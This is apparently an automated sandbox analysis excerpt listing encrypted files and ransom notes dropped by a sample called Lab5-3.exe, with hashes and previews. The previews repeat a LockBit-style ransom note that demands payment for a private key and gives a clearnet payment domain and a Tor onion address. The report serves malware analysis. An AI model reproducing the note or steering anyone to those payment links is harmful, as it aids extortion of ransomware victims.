                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2704
                                                                                                          Entropy (8bit):7.932465683747075
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:oMOApYTotaYoJJATsPdHcPYHfUTid3hBaUoSGFcmeykEdEElU92i:xeJA5XGx0uKeY2ElUJ
                                                                                                          MD5:BE52DF87DA7345B7959F05F5F7C80FCF
                                                                                                          SHA1:5719EEF78CB64DD0122A5E53047F70D410591521
                                                                                                          SHA-256:D1841430BC40269A805415A86458D32286558378D31B37F11F82CD0E5904AA48
                                                                                                          SHA-512:2594D9AE470E26A49528C2F97B6742630A87363FCD82AD08B3503D92D8A07EA82B793DF0A872530C5EC49C6E777EDD7254B76BBA2E5BC76F67D4C8F54F17444E
                                                                                                          Malicious:false
                                                                                                          Preview:.S..(Y..Wr....eV'...<....W^....a.u...M.C....7. .}:.x...#3.}|...=.%M.M...._.g>R.p:A..v .q..K...9..L\.a.Yx.yK.0...E%.Dtw_..jO..V.|.,L.|.=.....q.........%..#...Ko.{..%Q....}.....H...\...1......j.....a.N..*..&...........'.H4.PF4w..b.....8.zq..c..;}....m...gUx...[.g.+..R...$.<.U..H...;S..F..V*8r....X....Y?.C..zp...H......u!.....s3...kn.=.....G..R/...`...F....)..SJ...@.........T....2aP..#9...(.-.7u..#...M.N.QY.#r.t..zsn.-1^....b.......`B...Hw.+=.+.S.IZo.J...3).R....ml=9.K{............@....a3..x....:@.G.N#..ts..-.....N..v....l9.....p....^1.........[..Z..~.O. W.....R.1?**.*...Zu....Q\".~.=a.{J=mS..C.4..Z.....aa].2gh.p....T).7 ......fR..A.T......Tx|.1.&...-.0!s..6B.)f..0.j...Z.(#O..w4S.....c#...y..U5\3e...h.|.>wVsv.}u(L...q.......8.A.e.."..... ...wa....rK.....'9rdy...C.;........c.;..r7L.....p....z...85..g..q..p..P$..C....q....^..H....Rx.........|>.....u..z..l.0......OK.[.<}.g8....d.#...[.o.ef..VN.CB..V..s...g&D$.......r......P.8.B..X37.u..G.5.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2736
                                                                                                          Entropy (8bit):7.942436493075897
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:+TTKH8JS+BDtzhlHZLafvuJKvCQjy7JANHfUTid3hBaUoSGFcmeykEdEElU92i:oOePBDtz/aIKvCttAmGx0uKeY2ElUJ
                                                                                                          MD5:CEBA35E98A6FB69B220F05ED87D42523
                                                                                                          SHA1:7B955725F93F16546B5596C338E758DDEC038060
                                                                                                          SHA-256:D0B8BCB4E4C65E8A7BBE9BB6D5E1866BE793B5F43369F2D8327CD7E8F7065CAC
                                                                                                          SHA-512:09353740FB8A6565792B0EED086AC0FBAB349C4A92E2C81CFF51779742DDB597D4449C973FDC2E2757CA1D90B2F8F05B16AD29D06987D28DD71751FBB0ED51E8
                                                                                                          Malicious:false
                                                                                                          Preview:...t....=:.P...g.t-./.].0@..a...o.$/.?~.......{N?.?4......t.6..E..,...Lz.....UX.J&..........P.....3.....m...K...2...Z.+i...!s.#..98..1v..G..R.nc2......t..|).....bK..9./:..H}.....(U...)h.....@.Z.x.d=...?!..J....kHXnz|I.....7.x ..?&.&.H...HP..G.oF....{e.{.$..x.@...=~..T..,...6.>....J...(...r.X<..T.........`l3......Ulj.6.M .A.Hk.......{....m ..[.I$.(..W...#...G....f._"<......!.&n.=..8.+.....9...j.,..Y...9.\..Yhh...]...].}......{.b...#.6....b.3=.......g>.......w.8...<...n...[.O...d..m..`.&..q..I.2I5...C.g.UE...fy.G..../L.......p...:{.t..t.P..Y.....uk..DZ&......r./.../...Y.pk..|...2nn/.kE+.H....v.w.}.8...Vf.FZQC>..6...<......w..;\...ok............K..S...| h.<k..%Y..qE....d.0..EcY.R....V.....J.q......8<..._:.....<U-b..q. |.Z.....J0...`ZJP.[.0..3...g..H.q:7[.&5.........q^G.].....S0i...w......41..../#.....\../...x..z..,.|..vjR....Wlih7p..T...).x..J..B_Y.a1.G..TvH.h(.....I.3;..R.6.C....Z.M.+.1..i......*..4{..B.."j%.........e.%8No.>...OW}6*m...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.9366694868404375
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:TcYzgR10TTqfOVUx/APHpDexp4S0G//o6O6oHfUTid3hBaUoSGFcmeykEdEElU93:oYo1SqGV+4vpsOS0G//yEGx0uKeY2Elk
                                                                                                          MD5:ACE834B8606F604FAAA95437BD6A4341
                                                                                                          SHA1:65BBA7A2FBE0DC52E838FD5FEF08553B62262535
                                                                                                          SHA-256:19B3DDC37A4AF2D308B44134536F2C7F9EC315B05BDA7A0932916A993876B06B
                                                                                                          SHA-512:9F50071278329ABF33C6C8435DE55A58F37D54CE91A109E78E45D5BFDF8BC642D93509F6A3AC160995110C996FCFB49825A112CFB5C4B87996E16C94E74393E4
                                                                                                          Malicious:false
                                                                                                          Preview:Jg..x^...h.....|N8..x.?..@..+wn.A.b..!.~qH....#w....O...[|w...j.>.....:.s......4xG..(+....F...7.........U:.<..F.JHH....`.H2(G.b..N..O.RC.....r@.._..9#.$..<!..?..`.=..[.....Fk.......9m.rI...J.Q..?.......A....V.. .o..I..[!.R.u..FG.....XH.......l)..<.*......@Z.O..F.....}....\.'..1..|Z...s!]l.....t....S0.cr.a....8...Z.0 .z...R./...$...n5*..~3...~*s...}o..I..R.S.W{...P,...cf]^.wE.(.]..g.....F...d.x./.[(.Su.T.\.s....g"n.x!2Z.HS_c...p...d.....(G?.Ik...y..>.)..T....1M.'.*m|.......6......(OWT+..<....Og..".H.......}....'J..h^....a..<..5axvJ...?..\..S"..O.BffG.IW.*....*.u.K.:l.....AV.`.q..q.A+..d.q.U...Z.[v+'h.wG#.C...].7%p0.v.v..#. y? 3...R.....1..~..zY._.?..*.`...Y..8..i....}JG..c..A.b=.q63..)f..XwN_.._....Y..YG..*..6...H...G......-...v...d.'C.Jr.......{.M....p..v".t9.C....v..%ggR......l...0M.!....X..hv..lg.o....K..._.{.d...e'.E..u...K<.G..#.4..[".[@......r..bp2..K....._'..=.9.......d..R.,..s..6P..QD.E....8.....z....T'l.4lM.18/'..ir.N.hE1`.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.939299834083095
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:sEnI4OPEXN8eSoh66zdyTO0alqXcnMqHfUTid3hBaUoSGFcmeykEdEElU92i:sEI3OmepLMJaKoYGx0uKeY2ElUJ
                                                                                                          MD5:CA8DAC30AE3B4AAFDB24FD156215F3AD
                                                                                                          SHA1:52167BB08B4740563CE720F298FD039EEF800C73
                                                                                                          SHA-256:0D3D217CE908B3A3636E04DD40CE48BB62C1AA334CD93C30F392A9CEAE73595A
                                                                                                          SHA-512:271C004548C2615C962AA1CB16B8137BF067CE904A0FCE12DC65899AA908408552B71608953173CEC5549E752F42E6152FB5912F911BB7E02A5E7DA95E117377
                                                                                                          Malicious:false
                                                                                                          Preview:..^\..A...2...cy...2d...r_...=.tZ@.N.7.......>N..].T.......88..o4<.7+.P.`...V.U..[7.k.[.[.4.%.....P.SpyjT.Y.[..-mQ{.k...y............%.[.h(.....7..z6.M_l$$.N..^.V..+....O..g.t{B......>...?.V...V.'..W....I.:..H..j]..jjk-.XN...;q.....V.tu.L."@_.l{b.5.V..L.T.(m)O.b......XO(..vma.d.....i..8..2.[.T....Wo.....n{A......x...p....U(}n.. n..Bkr.F...$......,x...e..8F...m.M...@y...y.?...b.;.`US...$..i1BOgW.\.C.4.=`..]...a)=b.d..4.........vU..../..>y&.....`..v.l.iXf,3..u.bS..Uk...Zp.......W.5..R....H........T q...A;-1...Sb....4..QO.!.....s......._.as......G....\....P2.q...\..lr...P.<7.........._.5x.`...[;<...!y..;.o......_..,jA.....q..'D.f...Uv....).c.?N~..#....B...}..w;_.2.z|.4..0...+.......d5.Y...t*Os+.....T3.....y..@"..|...b'....>".#B....r..OTp.;.......p..f...D.{p.WY.._.s.>..W...~..0z...}..mF>x..U1}...n...1:.{(h9....)....!f+..".C.q..R....a.+.Ji....B....Z-.,W.....,.<f..<..[.*;D.(...m~.....\.vt<..i..pY+.|........X&..u4%...w.p[.d.........|.E8cJ.O+.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2768
                                                                                                          Entropy (8bit):7.934712016077708
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:9sEiXU5r0EYaSw7gmHYT6Fyhdg3MRPcHfUTid3hBaUoSGFcmeykEdEElU92i:ClXU5r0Ecw7dM3h0M5bGx0uKeY2ElUJ
                                                                                                          MD5:F3716E42874BD84B908203258FA0A367
                                                                                                          SHA1:05E73A3C9960F737EE4FC5AF8F4E92BA1172EBC3
                                                                                                          SHA-256:3C1C7A48BDDDB0E8C5DDD043DC72D8F3C88D8A86420AC2B520217AE48B7E7708
                                                                                                          SHA-512:B436191BB61D161E3D013335CB1DD021201285398171761497C094425F49CC60B6CA50DA22F68DEDA0C52ADDBC3845C05AD9978D534121C097CD999487B49C50
                                                                                                          Malicious:false
                                                                                                          Preview:..]\v..L....u"..FU.........3..h...@.LOIV..b.dC''>2N':vK..I...4.)."-"@.3l^..X..C.;.QD^.z.y..B.......3...c..~.|e.-...2.U.......I.@.gI..9.....}..r.n..m..........Lz>4.<......Oo....(........t{..#\'.>.`]q...W.K_adc.R..~y&..'.c-R..P..ah......Fv...n|f..{.......#}....@....p.<G..t......(...O.....0.E..M...%.hO.E.ZM.iT .\3\..F5Q-|..R...a.v.%....^.'.{1/_.........,gB...27..a.s$../....Eu.R.......,.N<.G...N...c9...A)...f(L.}.-...kb........Kte..pK..g...'.~..).'.G.]G.a.r..[nW.+.XS....o...1......v3.4P..H....H.....x.ntM%5f...^.3..K..K.Jb9H........S.=.z4s.&.........Y?. 5.|.3.8.....!.. ...q.t?.>U...^Q...4.........e..w^.o...E........+.`.....FB^.....h...j..a...0rK...{JS.(%.8.L.6.g.................3.....}.Q..J.........X.ub.......>.z.u4.YD..v....6s.&....@.[....<..1.4Cw..X......F.4.Y.S...?!..Y..'.YO.Ll.D.mN.....Y.U.W....,.c%(j...)1c+I.S...FN.U.........~...p.e...:..98.8-...x2..|.\IYdJ9............V.Oq.R..O...w....L.;..O`\...(..r.l...Rl.....ok+.^....-....n.m..N.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2736
                                                                                                          Entropy (8bit):7.939202772898986
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:zAgpF4myyMPxzarSTzN9RT9qGXBcjTcrfN5ywifHfUTid3hBaUoSGFcmeykEdEE+:8gpF46MP1arW99qGXBcjTIljFGx0uKeR
                                                                                                          MD5:CB57524F239B6180C9D14DD50A9CB85D
                                                                                                          SHA1:55CBD955C733E2719E3F5B8E87AE24B92B738173
                                                                                                          SHA-256:89A91BAE19D7B35D4D01DD95FF9F31039E2A56AD75A599D550AB5CA5309CA9EA
                                                                                                          SHA-512:758C4C299BBB1C9C80B971137B5C8341BF5106424EF8C7496418851DC1A2C5EBB6F73905B775AB152C7CFB7BE62BD97BE5E45AC5BC828F830CC74A4D0FBC286C
                                                                                                          Malicious:false
                                                                                                          Preview:3R)!9&-......,........6Z.....?W4..P.(0.y.K.X...k.=.<.!...(;...,*.c-.......u....xP)p. _&......B.W...j. hK.1._....J..3..4T7P...g../....t.zm3.7H.G.(..*...h...0..6*.M..C..W....I..&........0,..>|u.p.L....6Q....F..qI..^mC.f.C<......~u._ZF..`T2m.+S.L...K2.....*d...0.q{.k...Z..#.5o.&.l.#D.. ...zA[@H'.......b:...k.Lp8ia.....tI.#.DO..6...kU3......8...%......8.p.......'.....s]...N... .....3..Ymlr......N....QDCu$a.-..&9.[........]r.....wO8...........).Y.x....G+)...A#N..<".V.8...z...Q.~:..U...[Y|.../=3hb....>..s*Ox6u.0..d.n..>{.i.k.z../pe......s...F2/;$..P.b....3V..[...*.K..K.B|n.........w....'.z.C..+k${.@;V.........4.N..x{.mTG.?....,(Z...6.\}n.g...RC...(c.5...Y.(.3...AR!D...e..M.$B...2._......!......Bw.$..0...l...xL.!z%)..#%./..?].[5.%...FPt....E[..s.)6..2....z|Y[.b......H4f..B..@...h.f.3.w7.2...).p./#.*.u_B.a..G.&..&Ihb...$.......#..`.lR....?...0rI...,d..vpc.K2`..*..X.0.|A....8Ku.Q..X...h.].....P....W.a=..-D...(..fx5....TF.r.2.m.^.....b..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2736
                                                                                                          Entropy (8bit):7.938048547720738
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:71vSgQVlYuWLIjAnItjWG3tM+A2sOIaMykHfUTid3hBaUoSGFcmeykEdEElU92i:71arlIIjAIdA2saFjGx0uKeY2ElUJ
                                                                                                          MD5:DAC7A942F5368797174D23AE953B8C42
                                                                                                          SHA1:C6D5901AB1220EABE3A2BAEA335A864DFCFBC0AA
                                                                                                          SHA-256:C3D1A35921BE07A0601A25C92EA3C907A70CDBF0B5DBFF3763518BCB927FF325
                                                                                                          SHA-512:A5E3278BD081A4BE81CE19D978B1897DBA992766F9FA92254F99326976988D88684F6DDFC682A18B85B4BF87978ED1625B0E72C6D369EB25C7FD1AB6E37BD243
                                                                                                          Malicious:false
                                                                                                          Preview:.uKm@8C..thK...[>.....".O.b.Uw.F.<.C....&.....i.W..B2..0.].....s.F..Tl.E.~.>n^.O..=......._.s....p..l...GPe]9B....X...k..y.j!.8...m......|Q1[...'.0m.3Q..@%..8.g...n\.x.;Nau...V..../C.....1.C...g.e...A.b.*.cE]eg..sfTe...v...f.F.>r(~..<. .p.V.5.............Z...=....E.%..<m.cE...{..S.B0<.`..0.........8q.5..S.":{..h...NA.r}.h..n.;7........#.E.........P.\.5.D...q.C}.R7.a.M.!0.C...b2..\...~.b8....H.k#c...M.>.L...Q.|#..........?~[.GZ.....zn&-6 ..ax..M...`}..^hOG..f.*.j......o.....H.>...o....8...n)...._...."A@....U<.QK.6..$.t..K../{574^.....z.r.d..@.G[0....j..=....tw]..)w...1.Z&...3....K.e-..B.!.(.8...z/.\.P.4wZ@.....l..f...3Q=E.#..=..Dt(p..{.A.dW..+1..F..H...n......O.t,+P........M.......4,..h.." Q.5.<..M.>n.1+...4.y2J..9m....O+D...wp{..&>...?1....@P.p.q..R.....M.l7b.,n%..=...;A.......L.&...4.]6.F..-N&..3A6}....GNk$_..P....HD..<9..F.I]....j...<....Q..:..\g...ZX*.p8....EU. .(XW6.....2O.<..L....Kb..>w...qJ..Z.......7....P.S.U.1OE..n..M%G.,....M.;P
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2736
                                                                                                          Entropy (8bit):7.93646227252409
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:iuXAoW+8UezaF9M62Y1XvCY2vabhFHfUTid3hBaUoSGFcmeykEdEElU92i:OoWTUe+XdhhvSvuheGx0uKeY2ElUJ
                                                                                                          MD5:F151465C3666A5AD09CB0CA063420612
                                                                                                          SHA1:1CA0ACF27E2CED542FA0DEF739519AB4549DBFEE
                                                                                                          SHA-256:A5EBF35A0E81333BA403DEEFAA136A18E3F1BECD9EF2521399039EE8B2C53107
                                                                                                          SHA-512:8EF6686C5B1D87E2155C1482CFB660EB3D45F6CD34C2EAF5EB02CC382EB09A5CE2E8BB1A7B22A1C0DA174A917B7292A1566A7AE4D5D2330FA3CF19B62F062898
                                                                                                          Malicious:false
